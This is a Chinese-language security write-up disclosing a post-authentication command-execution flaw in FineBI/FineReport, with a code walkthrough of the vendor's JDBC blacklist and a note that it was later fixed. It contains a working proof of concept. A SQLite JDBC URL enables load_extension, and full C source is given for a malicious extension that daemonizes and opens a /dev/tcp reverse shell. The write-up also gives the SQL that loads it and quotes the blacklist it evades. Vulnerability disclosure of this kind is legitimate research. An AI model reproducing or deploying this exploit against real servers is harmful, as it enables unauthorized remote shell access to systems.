0x01 帆软finereBI/report后台本地命令执行
data:image/s3,"s3://crabby-images/d8d9e/d8d9e78d0d4a29a46e05fc3b9e5fc415f0e964ea" alt="image-20240614022512688"
JAR包版本号:
6.1.0(JAR:Build#persist-2024.05.30.11.06.10.457)
https://www.finebi.com/product/download
data:image/s3,"s3://crabby-images/d6ce3/d6ce3337be945bbb1c664e79f35683ef48efaea1" alt="image-20240614022553224"
对应版本6月12日的版本
0x02 poc 构造
下载发现官方软件代码,出厂lib中存在sqlite组件。
data:image/s3,"s3://crabby-images/91513/915137d9e6fd3b753b004d588c3f70ca5b438007" alt="image-20240614023128668"
http://localhost:37799/webroot/decision#/management/connection
在url可以配置数据库连接
data:image/s3,"s3://crabby-images/389f3/389f3a52907aee51bd91aed7a9c4bdf8f259ff5f" alt="image-20240614022840926"
jdbcurl可控这里可以是设置为 jdbc:sqlite:DBPATH?enable_load_extension=true
开启**load_extension()**函数
https://sqlite.readdevdocs.com/loadext.html 这里有恶意dll 编写模版。
这里我是mac系统;
对应的恶意dll文件代码。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69
| #include <stdlib.h> #include <stdio.h> #include <sqlite3ext.h> #include <sys/stat.h> #include <unistd.h> #include <fcntl.h>
SQLITE_EXTENSION_INIT1
#ifdef _WIN32 __declspec(dllexport) #endif
int sqlite3_extension_init( sqlite3 *db, char **pzErrMsg, const sqlite3_api_routines *pApi ) { int rc = SQLITE_OK; SQLITE_EXTENSION_INIT2(pApi);
pid_t pid = fork(); if (pid < 0) { perror("fork error"); exit(1); } else if (pid > 0) { while (1) { } }
umask(0);
if (setsid() < 0) { perror("setsid error"); exit(1); }
close(STDIN_FILENO); close(STDOUT_FILENO); close(STDERR_FILENO);
int fd = open("/dev/null", O_RDWR); dup2(fd, STDIN_FILENO); dup2(fd, STDOUT_FILENO); dup2(fd, STDERR_FILENO); close(fd);
const char *args[] = {"/bin/sh", "-c", "/bin/sh -i >& /dev/tcp/127.0.0.1/8888 0>&1", NULL}; execve("/bin/sh", (char* const*)args, NULL);
return 0; return rc; }
|
填写好接收反弹shell的地址。
使用gcc编译成恶意的动态链接库。
然后修改成
然后在校验语句这里输入语句执行我们恶意动态库文件**SELECT load_extension(‘poc.dylib’)**; 修改为dylic的路径。
执行后nc接收到shell。
data:image/s3,"s3://crabby-images/d826a/d826a4bae4dc2cca263b05cf231605efee8d4de6" alt="image-20240614022922220"
0x03 代码分析
与finereport有点不同,
com.fr.decision.webservice.v10.datasource.connection.ConnectionService.getDriverPath
data:image/s3,"s3://crabby-images/7c201/7c20150252744dce842d83f16bc62e610c462498" alt="image-20240614024201059"
在这里接受我们传入的jdbc连接
om.fr.decision.webservice.v10.datasource.connection.processor.impl.ConnectionProcessorFactory.getDriverPath
data:image/s3,"s3://crabby-images/a1559/a1559a58440b52622e520999ed904e394fd71f79" alt="image-20240614024335360"
com.fr.decision.webservice.v10.datasource.connection.processor.impl.JDBCConnectionProcessor.convertToJDBCConnectio
data:image/s3,"s3://crabby-images/4b7bf/4b7bf2817f6b204c9fdda5cf3150b5f581017de6" alt="image-20240614024718057"
一系列调用后来看这里,完成jdbc链接的赋值,最后调用validateSettings进行检查
com.fr.decision.webservice.v10.datasource.connection.processor.impl.JDBCConnectionProcessor.validateSettings
data:image/s3,"s3://crabby-images/44c4a/44c4ae5a2ebf23bbf7bea7bac4a2ab1012604c7e" alt="image-20240614025114552"
这里会反射获取数据库服务,然后调用 JDBCSecurityChecker.checkUr进行检查。
com.fr.data.core.db.JDBCSecurityChecker#check
data:image/s3,"s3://crabby-images/86c03/86c0367fee7d16f8ee7ef548e8edbf8619f16e04" alt="image-20240614025435321"
然后在黑名单进行匹配。
data:image/s3,"s3://crabby-images/24324/24324a44a53d3363f595fe3d9d47857492a48efb" alt="image-20240614025745936"
对应的黑名单
1 2 3 4 5 6 7
| private static final InsecurityElement[] FORBIDDEN_ELEMENTS_OF_URL = new InsecurityElement[] { (InsecurityElement)new InsecurityURLParameter("INIT="), (InsecurityElement)new InsecurityURLParameter("allowLoadLocalInfile="), (InsecurityElement)new InsecurityURLParameter("autoDeserialize="), (InsecurityElement)new InsecurityURLParameter("clientRerouteServerListJNDIName="), (InsecurityElement)new InsecurityURLParameter("jcr:jndi:"), (InsecurityElement)new InsecurityURLParameter("slaveHost="), (InsecurityElement)new InsecurityURLParameter("sqlite::resource"), (InsecurityElement)new InsecurityURLParameter("mysql:fabric"), (InsecurityElement)new InsecurityURLParameter("socketFactory="), (InsecurityElement)new InsecurityURLParameter("loggerFile="), (InsecurityElement)new InsecurityURLParameter("TRIGGER"), (InsecurityElement)new InsecurityURLParameter("java.lang.Runtime"), (InsecurityElement)new InsecurityURLParameter("java.lang.ProcessBuilder"), (InsecurityElement)new InsecurityURLParameter("java.lang.ProcessImpl"), (InsecurityElement)new InsecurityURLResource() };
private static final InsecurityElement[] FORBIDDEN_ELEMENTS_OF_VALIDATION_QUERY = new InsecurityElement[] { (InsecurityElement)new InsecuritySQLKeyword("create"), (InsecurityElement)new InsecuritySQLKeyword("drop"), (InsecurityElement)new InsecuritySQLKeyword("alter"), (InsecurityElement)new InsecuritySQLKeyword("insert"), (InsecurityElement)new InsecuritySQLKeyword("delete"), (InsecurityElement)new InsecuritySQLKeyword("merge"), (InsecurityElement)new InsecuritySQLKeyword("attach"), (InsecurityElement)new InsecuritySQLKeyword("benchmark"), (InsecurityElement)new InsecuritySQLKeyword("xp_dirtree") };
|
可以看到enable_load_extension=true 不在黑名单中,最后找成了执行恶意动态库。
过于复杂,推荐前端复现。
0x04 修复
等待官网修复,截止报告提交时间2024年6月14日,通杀所有版本。 截止8.4日,最新版已修复
声明
此文章 仅用于教育目的。请负责任地使用它,并且仅在您有明确测试权限的系统上使用。滥用此 PoC 可能会导致严重后果。